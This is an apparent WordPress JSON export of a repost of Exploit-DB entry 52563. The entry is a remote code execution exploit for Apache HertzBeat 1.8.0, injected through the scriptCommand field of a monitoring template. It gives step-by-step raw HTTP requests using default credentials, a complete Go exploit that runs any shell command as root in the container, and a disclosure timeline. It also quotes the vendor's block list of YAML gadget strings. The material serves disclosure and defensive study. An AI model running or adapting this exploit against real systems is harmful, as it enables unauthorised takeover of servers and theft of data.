{"id":54458,"date":"2026-05-14T08:47:58","date_gmt":"2026-05-14T08:47:58","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=54458"},"modified":"2026-05-14T08:47:58","modified_gmt":"2026-05-14T08:47:58","slug":"apache-hertzbeat-180-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=54458","title":{"rendered":"Apache HertzBeat 1.8.0 &#8211; Remote Code Execution_EDB-ID:52563"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-14T13:28:58&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Apache HertzBeat 1.8.0 &#8211; Remote Code Execution Google Dork: N\/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https:\/\/hertzbeat.apache.org\/ Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases Version: 1.8.0&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-14T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-14T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;Apache HertzBeat 1.8.0 &#8211; Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52563&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Apache HertzBeat 1.8.0 &#8211; Remote Code Execution \\r\\n# Google Dork: N\/A\\r\\n# Date: 2026-03-09\\r\\n# Exploit Author: Brett Gervasoni\\r\\n# Vendor Homepage: https:\/\/hertzbeat.apache.org\/\\r\\n# Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases\\r\\n# Version: 1.8.0\\r\\n# Tested on: Linux (Docker; official HertzBeat image, uid=0 in container)\\r\\n# CVE: N\/A\\r\\n\\r\\n================================================================================\\r\\nMETADATA\\r\\n================================================================================\\r\\n\\r\\nSeverity: CRITICAL\\r\\nImpact: Arbitrary command execution via monitoring template (script protocol)\\r\\nCWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)\\r\\nProduct: Apache HertzBeat \u2014 https:\/\/hertzbeat.apache.org\/ (v1.8.0)\\r\\nAffected Component: ScriptCollectImpl.collect()\\r\\nAffected Endpoint: PUT \/api\/apps\/define\/yml\\r\\nAuthentication: Required (standard user or admin)\\r\\n\\r\\nNote: Apache Security does not classify this as a vulnerability; see HertzBeat\\r\\nsecurity model: https:\/\/hertzbeat.apache.org\/docs\/help\/security_model\/\\r\\n\\r\\n================================================================================\\r\\nVULNERABILITY SUMMARY\\r\\n================================================================================\\r\\n\\r\\nHertzBeat allows arbitrary OS commands to be executed via the scriptCommand\\r\\nparameter in a monitoring template definition.\\r\\n\\r\\nAn authenticated user can overwrite a monitoring template definition via\\r\\nPUT \/api\/apps\/define\/yml. The \\&#8221;define\\&#8221; body contains YAML parsed into a Job.\\r\\nWhen the YAML specifies protocol: script, the attacker-controlled scriptCommand\\r\\nstring is passed to ProcessBuilder (bash -c \\&#8221;\\u003ccommand\\u003e\\&#8221;) without sanitization.\\r\\n\\r\\nIf the overwritten template has active monitoring instances, updateAppCollectJob()\\r\\nre-dispatches them, triggering execution within seconds. If none exist, the\\r\\nattacker can create one via POST \/api\/monitor to trigger immediate execution.\\r\\n\\r\\nThe default Docker deployment runs the process as root (uid=0).\\r\\n\\r\\n================================================================================\\r\\nVULNERABLE CODE (REFERENCE)\\r\\n================================================================================\\r\\n\\r\\nSink \u2014 ScriptCollectImpl.java (approx. lines 74\u2013114) \u2014 direct execution:\\r\\n\\r\\n    public void collect(CollectRep.MetricsData.Builder builder, Metrics metrics) {\\r\\n        ScriptProtocol scriptProtocol = metrics.getScript();\\r\\n        \/\/ &#8230;\\r\\n        if (StringUtils.hasText(scriptProtocol.getScriptCommand())) {\\r\\n            switch (scriptProtocol.getScriptTool()) {\\r\\n                case BASH -\\u003e processBuilder = new ProcessBuilder(\\r\\n                    BASH, BASH_C, scriptProtocol.getScriptCommand().trim());  \/\/ payload\\r\\n                \/\/ &#8230;\\r\\n            }\\r\\n        }\\r\\n        \/\/ &#8230;\\r\\n        Process process = processBuilder.start();  \/\/ executed\\r\\n    }\\r\\n\\r\\nYAML gadget blocking \u2014 AppController.java (approx. 55\u201359) \u2014 blocks SnakeYAML\\r\\ngadget strings, not shell command injection:\\r\\n\\r\\n    private static final String[] RISKY_STR_ARR = {\\&#8221;ScriptEngineManager\\&#8221;, \\&#8221;URLClassLoader\\&#8221;, \\&#8221;!!\\&#8221;,\\r\\n            \\&#8221;ClassLoader\\&#8221;, \\&#8221;AnnotationConfigApplicationContext\\&#8221;, \\&#8221;FileSystemXmlApplicationContext\\&#8221;,\\r\\n            \\&#8221;GenericXmlApplicationContext\\&#8221;, \\&#8221;GenericGroovyApplicationContext\\&#8221;, \\&#8221;GroovyScriptEngine\\&#8221;,\\r\\n            \\&#8221;GroovyClassLoader\\&#8221;, \\&#8221;GroovyShell\\&#8221;, \\&#8221;ScriptEngine\\&#8221;, \\&#8221;ScriptEngineFactory\\&#8221;,\\r\\n            \\&#8221;XmlWebApplicationContext\\&#8221;, \\&#8221;ClassPathXmlApplicationContext\\&#8221;, \\&#8221;MarshalOutputStream\\&#8221;,\\r\\n            \\&#8221;InflaterOutputStream\\&#8221;, \\&#8221;FileOutputStream\\&#8221;};\\r\\n\\r\\n================================================================================\\r\\nPROOF OF CONCEPT \u2014 RAW HTTP\\r\\n================================================================================\\r\\n\\r\\nReplace TARGET with the HertzBeat host. Default port is 1157. Example uses a\\r\\nstandard user \\&#8221;operator\\&#8221; \/ \\&#8221;hertzbeat\\&#8221; (user role); admin with default\\r\\npassword also works.\\r\\n\\r\\n&#8212; Step 1: Authenticate &#8212;\\r\\n\\r\\nPOST \/api\/account\/auth\/form HTTP\/1.1\\r\\nHost: TARGET:1157\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\&#8221;type\\&#8221;:1,\\&#8221;identifier\\&#8221;:\\&#8221;operator\\&#8221;,\\&#8221;credential\\&#8221;:\\&#8221;hertzbeat\\&#8221;}\\r\\n\\r\\nResponse: data.token (JWT) \u2014 use as Bearer below.\\r\\n\\r\\n&#8212; Step 2: Overwrite linux_script template &#8212;\\r\\n\\r\\nPUT \/api\/apps\/define\/yml HTTP\/1.1\\r\\nHost: TARGET:1157\\r\\nAuthorization: Bearer \\u003cJWT\\u003e\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\&#8221;define\\&#8221;:\\&#8221;app: linux_script\\\\ncategory: os\\\\nname:\\\\n  en-US: Linux Script\\\\n  zh-CN: Linux Script\\\\nparams:\\\\n  &#8211; field: host\\\\n    name:\\\\n      en-US: Host\\\\n      zh-CN: Host\\\\n    type: host\\\\n    required: true\\\\nmetrics:\\\\n  &#8211; name: basic\\\\n    i18n:\\\\n      en-US: Basic\\\\n      zh-CN: Basic\\\\n    priority: 0\\\\n    fields:\\\\n      &#8211; field: result\\\\n        type: 1\\\\n        i18n:\\\\n          en-US: Result\\\\n          zh-CN: Result\\\\n    protocol: script\\\\n    script:\\\\n      scriptTool: bash\\\\n      charset: UTF-8\\\\n      scriptCommand: id \\u003e \/tmp\/pwned\\\\n      parseType: multiRow\\\\n\\&#8221;}\\r\\n\\r\\nDecoded define (YAML):\\r\\n\\r\\napp: linux_script\\r\\ncategory: os\\r\\nname:\\r\\n  en-US: Linux Script\\r\\n  zh-CN: Linux Script\\r\\nparams:\\r\\n  &#8211; field: host\\r\\n    name:\\r\\n      en-US: Host\\r\\n      zh-CN: Host\\r\\n    type: host\\r\\n    required: true\\r\\nmetrics:\\r\\n  &#8211; name: basic\\r\\n    i18n:\\r\\n      en-US: Basic\\r\\n      zh-CN: Basic\\r\\n    priority: 0\\r\\n    fields:\\r\\n      &#8211; field: result\\r\\n        type: 1\\r\\n        i18n:\\r\\n          en-US: Result\\r\\n          zh-CN: Result\\r\\n    protocol: script\\r\\n    script:\\r\\n      scriptTool: bash\\r\\n      charset: UTF-8\\r\\n      scriptCommand: id \\u003e \/tmp\/pwned\\r\\n      parseType: multiRow\\r\\n\\r\\nExpected response:\\r\\n\\r\\nHTTP\/1.1 200 OK\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\&#8221;code\\&#8221;:0,\\&#8221;msg\\&#8221;:null,\\&#8221;data\\&#8221;:null}\\r\\n\\r\\n&#8212; Step 3: Create monitor (if no linux_script monitors exist) &#8212;\\r\\n\\r\\nPOST \/api\/monitor HTTP\/1.1\\r\\nHost: TARGET:1157\\r\\nAuthorization: Bearer \\u003cJWT\\u003e\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\&#8221;monitor\\&#8221;:{\\&#8221;name\\&#8221;:\\&#8221;rce-test\\&#8221;,\\&#8221;app\\&#8221;:\\&#8221;linux_script\\&#8221;,\\&#8221;host\\&#8221;:\\&#8221;127.0.0.1\\&#8221;,\\&#8221;intervals\\&#8221;:30,\\&#8221;status\\&#8221;:1},\\&#8221;params\\&#8221;:[{\\&#8221;field\\&#8221;:\\&#8221;host\\&#8221;,\\&#8221;paramValue\\&#8221;:\\&#8221;127.0.0.1\\&#8221;,\\&#8221;type\\&#8221;:1}]}\\r\\n\\r\\n&#8212; Step 4: Verify (example: Docker) &#8212;\\r\\n\\r\\ndocker exec hertzbeat cat \/tmp\/pwned\\r\\n\\r\\nExpected:\\r\\n\\r\\nuid=0(root) gid=0(root) groups=0(root)\\r\\n\\r\\n================================================================================\\r\\nEXPLOIT CODE \u2014 script_command_rce.go (Go)\\r\\n================================================================================\\r\\n\\r\\npackage main\\r\\n\\r\\nimport (\\r\\n\\t\\&#8221;bytes\\&#8221;\\r\\n\\t\\&#8221;encoding\/json\\&#8221;\\r\\n\\t\\&#8221;fmt\\&#8221;\\r\\n\\t\\&#8221;io\\&#8221;\\r\\n\\t\\&#8221;math\/rand\\&#8221;\\r\\n\\t\\&#8221;net\/http\\&#8221;\\r\\n\\t\\&#8221;os\\&#8221;\\r\\n\\t\\&#8221;strings\\&#8221;\\r\\n)\\r\\n\\r\\nconst target = \\&#8221;http:\/\/localhost:1157\\&#8221;\\r\\n\\r\\ntype authResponse struct {\\r\\n\\tCode int `json:\\&#8221;code\\&#8221;`\\r\\n\\tData struct {\\r\\n\\t\\tToken string `json:\\&#8221;token\\&#8221;`\\r\\n\\t} `json:\\&#8221;data\\&#8221;`\\r\\n}\\r\\n\\r\\ntype apiResponse struct {\\r\\n\\tCode int    `json:\\&#8221;code\\&#8221;`\\r\\n\\tMsg  string `json:\\&#8221;msg\\&#8221;`\\r\\n}\\r\\n\\r\\nfunc main() {\\r\\n\\tif len(os.Args) \\u003c 2 {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\&#8221;Usage: %s \\u003ccommand\\u003e\\\\n\\&#8221;, os.Args[0])\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\&#8221;Example: %s \\\\\\&#8221;id \\u003e \/tmp\/pwned\\\\\\&#8221;\\\\n\\&#8221;, os.Args[0])\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\tcmd := strings.Join(os.Args[1:], \\&#8221; \\&#8221;)\\r\\n\\r\\n\\tfmt.Println(\\&#8221;============================================================\\&#8221;)\\r\\n\\tfmt.Println(\\&#8221; HertzBeat ScriptCollectImpl RCE\\&#8221;)\\r\\n\\tfmt.Println(\\&#8221;============================================================\\&#8221;)\\r\\n\\tfmt.Println()\\r\\n\\r\\n\\tfmt.Println(\\&#8221;[*] Authenticating&#8230;\\&#8221;)\\r\\n\\r\\n\\ttoken, err := authenticate()\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\&#8221;[-] Auth failed: %v\\\\n\\&#8221;, err)\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Printf(\\&#8221;[+] Got token: %s&#8230;\\\\n\\\\n\\&#8221;, token[:40])\\r\\n\\r\\n\\tfmt.Println(\\&#8221;[*] Overwriting linux_script template&#8230;\\&#8221;)\\r\\n\\tfmt.Printf(\\&#8221;    PUT \/api\/apps\/define\/yml\\\\n\\&#8221;)\\r\\n\\tfmt.Printf(\\&#8221;    scriptCommand: %s\\\\n\\&#8221;, cmd)\\r\\n\\r\\n\\terr = putMaliciousDefine(token, cmd)\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\&#8221;[-] Failed to overwrite template: %v\\\\n\\&#8221;, err)\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Println(\\&#8221;[+] Template overwritten.\\&#8221;)\\r\\n\\tfmt.Println()\\r\\n\\r\\n\\tfmt.Println(\\&#8221;[*] Creating monitor instance to trigger collection&#8230;\\&#8221;)\\r\\n\\tfmt.Println(\\&#8221;    POST \/api\/monitor with app: linux_script\\&#8221;)\\r\\n\\r\\n\\terr = createMonitor(token)\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\&#8221;[-] Failed to create monitor: %v\\\\n\\&#8221;, err)\\r\\n\\t\\tfmt.Println(\\&#8221;[*] This may fail if a monitor already exists \u2014 checking anyway&#8230;\\&#8221;)\\r\\n\\t} else {\\r\\n\\t\\tfmt.Println(\\&#8221;[+] Monitor created.\\&#8221;)\\r\\n\\t\\tfmt.Println()\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Println(\\&#8221;[+] Completed. If it wasn&#8217;t executed instantly, wait ~30 seconds for the collector.\\&#8221;)\\r\\n\\tfmt.Printf(\\&#8221;[+] Command: %s\\\\n\\\\n\\&#8221;, cmd)\\r\\n\\tfmt.Println(\\&#8221;[*] Verify with (assuming its running in docker locally):\\&#8221;)\\r\\n\\tfmt.Println(\\&#8221;    docker exec hertzbeat \\u003ccheck your payload\\u003e\\&#8221;)\\r\\n}\\r\\n\\r\\nfunc authenticate() (string, error) {\\r\\n\\tbody := `{\\&#8221;type\\&#8221;:1,\\&#8221;identifier\\&#8221;:\\&#8221;operator\\&#8221;,\\&#8221;credential\\&#8221;:\\&#8221;hertzbeat\\&#8221;}`\\r\\n\\r\\n\\tresp, err := http.Post(target+\\&#8221;\/api\/account\/auth\/form\\&#8221;, \\&#8221;application\/json\\&#8221;, bytes.NewBufferString(body))\\r\\n\\tif err != nil {\\r\\n\\t\\treturn \\&#8221;\\&#8221;, err\\r\\n\\t}\\r\\n\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\tvar result authResponse\\r\\n\\tif err := json.NewDecoder(resp.Body).Decode(\\u0026result); err != nil {\\r\\n\\t\\treturn \\&#8221;\\&#8221;, err\\r\\n\\t}\\r\\n\\r\\n\\tif result.Code != 0 || result.Data.Token == \\&#8221;\\&#8221; {\\r\\n\\t\\treturn \\&#8221;\\&#8221;, fmt.Errorf(\\&#8221;unexpected response code %d\\&#8221;, result.Code)\\r\\n\\t}\\r\\n\\r\\n\\treturn result.Data.Token, nil\\r\\n}\\r\\n\\r\\nfunc putMaliciousDefine(token, command string) error {\\r\\n\\tdefine := fmt.Sprintf(`app: linux_script\\r\\ncategory: os\\r\\nname:\\r\\n  en-US: Linux Script\\r\\n  zh-CN: Linux Script\\r\\nparams:\\r\\n  &#8211; field: host\\r\\n    name:\\r\\n      en-US: Host\\r\\n      zh-CN: Host\\r\\n    type: host\\r\\n    required: true\\r\\nmetrics:\\r\\n  &#8211; name: basic\\r\\n    i18n:\\r\\n      en-US: Basic\\r\\n      zh-CN: Basic\\r\\n    priority: 0\\r\\n    fields:\\r\\n      &#8211; field: result\\r\\n        type: 1\\r\\n        i18n:\\r\\n          en-US: Result\\r\\n          zh-CN: Result\\r\\n    protocol: script\\r\\n    script:\\r\\n      scriptTool: bash\\r\\n      charset: UTF-8\\r\\n      scriptCommand: \\&#8221;%s \\u0026\\u0026 echo result done\\&#8221;\\r\\n      parseType: multiRow\\r\\n`, command)\\r\\n\\r\\n\\tpayload, _ := json.Marshal(map[string]string{\\&#8221;define\\&#8221;: define})\\r\\n\\r\\n\\treq, _ := http.NewRequest(\\&#8221;PUT\\&#8221;, target+\\&#8221;\/api\/apps\/define\/yml\\&#8221;, bytes.NewBuffer(payload))\\r\\n\\treq.Header.Set(\\&#8221;Content-Type\\&#8221;, \\&#8221;application\/json\\&#8221;)\\r\\n\\treq.Header.Set(\\&#8221;Authorization\\&#8221;, \\&#8221;Bearer \\&#8221;+token)\\r\\n\\r\\n\\tresp, err := http.DefaultClient.Do(req)\\r\\n\\tif err != nil {\\r\\n\\t\\treturn err\\r\\n\\t}\\r\\n\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\trespBody, _ := io.ReadAll(resp.Body)\\r\\n\\r\\n\\tvar result apiResponse\\r\\n\\tif err := json.Unmarshal(respBody, \\u0026result); err != nil {\\r\\n\\t\\treturn fmt.Errorf(\\&#8221;HTTP %d: %s\\&#8221;, resp.StatusCode, string(respBody))\\r\\n\\t}\\r\\n\\r\\n\\tif result.Code != 0 {\\r\\n\\t\\treturn fmt.Errorf(\\&#8221;API error (code %d): %s\\&#8221;, result.Code, result.Msg)\\r\\n\\t}\\r\\n\\r\\n\\treturn nil\\r\\n}\\r\\n\\r\\nfunc createMonitor(token string) error {\\r\\n\\tsuffix := randSuffix()\\r\\n\\tname := fmt.Sprintf(\\&#8221;rce-poc-%s\\&#8221;, suffix)\\r\\n\\tbody := fmt.Sprintf(`{\\&#8221;monitor\\&#8221;:{\\&#8221;name\\&#8221;:\\&#8221;%s\\&#8221;,\\&#8221;app\\&#8221;:\\&#8221;linux_script\\&#8221;,\\&#8221;host\\&#8221;:\\&#8221;127.0.0.1\\&#8221;,\\&#8221;intervals\\&#8221;:30,\\&#8221;status\\&#8221;:1},\\&#8221;params\\&#8221;:[{\\&#8221;field\\&#8221;:\\&#8221;host\\&#8221;,\\&#8221;paramValue\\&#8221;:\\&#8221;127.0.0.1\\&#8221;,\\&#8221;type\\&#8221;:1}]}`, name)\\r\\n\\r\\n\\treq, _ := http.NewRequest(\\&#8221;POST\\&#8221;, target+\\&#8221;\/api\/monitor\\&#8221;, bytes.NewBufferString(body))\\r\\n\\treq.Header.Set(\\&#8221;Content-Type\\&#8221;, \\&#8221;application\/json\\&#8221;)\\r\\n\\treq.Header.Set(\\&#8221;Authorization\\&#8221;, \\&#8221;Bearer \\&#8221;+token)\\r\\n\\r\\n\\tresp, err := http.DefaultClient.Do(req)\\r\\n\\tif err != nil {\\r\\n\\t\\treturn err\\r\\n\\t}\\r\\n\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\trespBody, _ := io.ReadAll(resp.Body)\\r\\n\\tvar result apiResponse\\r\\n\\tif err := json.Unmarshal(respBody, \\u0026result); err != nil {\\r\\n\\t\\treturn fmt.Errorf(\\&#8221;HTTP %d: %s\\&#8221;, resp.StatusCode, string(respBody))\\r\\n\\t}\\r\\n\\r\\n\\tif result.Code != 0 {\\r\\n\\t\\treturn fmt.Errorf(\\&#8221;API error (code %d): %s\\&#8221;, result.Code, result.Msg)\\r\\n\\t}\\r\\n\\treturn nil\\r\\n}\\r\\n\\r\\nfunc randSuffix() string {\\r\\n\\tconst chars = \\&#8221;abcdefghijklmnopqrstuvwxyz0123456789\\&#8221;\\r\\n\\tb := make([]byte, 8)\\r\\n\\r\\n\\tfor i := range b {\\r\\n\\t\\tb[i] = chars[rand.Intn(len(chars))]\\r\\n\\t}\\r\\n\\r\\n\\treturn string(b)\\r\\n}\\r\\n\\r\\n================================================================================\\r\\nNOTES\\r\\n================================================================================\\r\\n\\r\\n- A standard user (e.g. operator:hertzbeat, user role) is sufficient; admin is\\r\\n  not required for the described flow.\\r\\n- A new custom app name (e.g. app: rce_custom) can be registered with POST\\r\\n  instead of PUT to avoid overwriting an existing definition; then create a\\r\\n  monitor for that app.\\r\\n\\r\\n================================================================================\\r\\nDISCLOSURE \/ VENDOR RESPONSE (SUMMARY)\\r\\n================================================================================\\r\\n\\r\\nApache Security indicated this aligns with the documented security model: only\\r\\ntrusted operators should receive accounts; customization is intentional.\\r\\nRole-based permission controls are still evolving; see vendor documentation.\\r\\n\\r\\nReporting timeline:\\r\\n- 2026-02-19: Reported to Apache Security\\r\\n- 2026-02-19 to 2026-03-04: Discussion on post-authentication issues\\r\\n- 2026-03-04: Apache position communicated (risk accepted per security model)\\r\\n- 2026-03-09: Public advisory&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52563&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52563&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-14T13:28:58&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Apache HertzBeat 1.8.0 &#8211; Remote Code Execution Google Dork: N\/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https:\/\/hertzbeat.apache.org\/ Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases Version:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-54458","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Apache HertzBeat 1.8.0 - Remote Code Execution_EDB-ID:52563 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=54458\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Apache HertzBeat 1.8.0 - Remote Code Execution_EDB-ID:52563 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-14T13:28:58&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: Apache HertzBeat 1.8.0 &#8211; Remote Code Execution Google Dork: N\/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https:\/\/hertzbeat.apache.org\/ Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases Version:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=54458\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-14T08:47:58+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Apache HertzBeat 1.8.0 &#8211; Remote Code Execution_EDB-ID:52563\",\"datePublished\":\"2026-05-14T08:47:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458\"},\"wordCount\":2255,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=54458#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458\",\"name\":\"Apache HertzBeat 1.8.0 - Remote Code Execution_EDB-ID:52563 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-14T08:47:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=54458\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=54458#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Apache HertzBeat 1.8.0 &#8211; Remote Code Execution_EDB-ID:52563\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 